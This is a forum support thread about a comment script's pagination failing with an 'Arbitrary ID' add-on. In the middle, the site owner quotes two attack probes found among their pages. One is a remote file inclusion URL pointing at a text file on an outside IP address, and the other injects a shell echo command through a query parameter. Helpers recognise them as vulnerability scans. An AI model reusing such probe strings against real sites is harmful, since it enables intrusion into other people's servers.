Posts: 36
Threads: 9
Joined: Nov 2010
Hello
Dont really it this is a bug at all
Anyway, If you look at the following page:
http://falsafa.info/cours2.php
You sall see a pagination:
1 2 3 > [last]
But if you click on 2 or 3 you shall see no further comments !!
Posts: 2,894
Threads: 59
Joined: Jun 2010
Have
you completed
the interview?
Posts: 36
Threads: 9
Joined: Nov 2010
Well, I did enable
Settings -> Error Reporting and enable it for BOTH the front AND backend
I toggled between Log errors to file and Show on screen
Then I visited the pagination pages, but no error was showing !!
I kept the settings on Show on screen so you can visit the above page to see by yourself
Posts: 2,894
Threads: 59
Joined: Jun 2010
Maybe there is a problem with your page IDs.
Check in Manage -> Pages to make sure that they are all correct and unique.
Have
you completed
the interview?
Posts: 36
Threads: 9
Joined: Nov 2010
Did you mean that two pages are sharing the same ID ?
I see Ids listed from 1 to 127 There is no duplicate ID
However, from manage ---> pages, I noticed two strange pages:
Code:
http://falsafa.info/bonheur-c.php/errors.php?error=http://203.168.202.14/resturant/logs/.bbs/CKrid1.txt??
http://falsafa.info/bonheur-c.php/errors.php?error=%7Cecho%20%22IndoCrew%22;%7C
I am afraid, this looks like a hacker sites !!!
Posts: 2,894
Threads: 59
Joined: Jun 2010
Okay, I assume that you're using the 'Arbitrary ID' add-on. It looks like someone, or perhaps even a bot, has been testing for vulnerabilities and has inadvertently created a new page. Probably nothing to worry about.
I wonder whether this is an issue with the 'p' parameter. Is your website powered by some type of software? If so, it might be using code which conflicts with the '?p=x' query parameter.
Have
you completed
the interview?
Posts: 36
Threads: 9
Joined: Nov 2010
Yes I am using the 'Arbitrary ID' add-on
But I am installing no other software on my site
Posts: 2,894
Threads: 59
Joined: Jun 2010
I can't think of anymore obvious causes. I would need to see the relevant code in order to determine for sure why it's not working. Maybe Static has some other ideas that you can try.
Have
you completed
the interview?
Posts: 535
Threads: 31
Joined: Jul 2010
"http://203.168.202.14/resturant/logs/.bbs/CKrid1.txt"
^^^ What's up with that file? ^^^
Here's a quick
Google search on CKrid.
This is the interesting stuff:
http://www.bizimbal.com/docs/article02.html
Apparently, a hacker was checking if the server is hackable through remote code injection. I don't think it has anything to do with Commentics though (apart from fopen). Be on guard anyway.
More info on that IP:
http://www.bizimbal.com/odb/details.html?id=776861
Now, back to the bug...
I assume you use version 1.2, and not the beta. Can you explain how you implemented the arbitrary ID add-on? When switching pages, you forgot to mention that it shows the "No Comments" message. The bug is most likely a conflict with pagination. I suspect that you defined the following variable:
PHP Code:
<?php
$arbitrary_id_reference = '';//Your value/variable here
as "$_GET['p']". If so, try leaving it blank.
P.S. I found the Google translation for the "No Comments" message quite interesting:
"There are no comments yet. Why not be the first to hasten the deployment of a comment!?"
EDIT: Yay, my
5x10^2 post!
I'm giving you three guesses...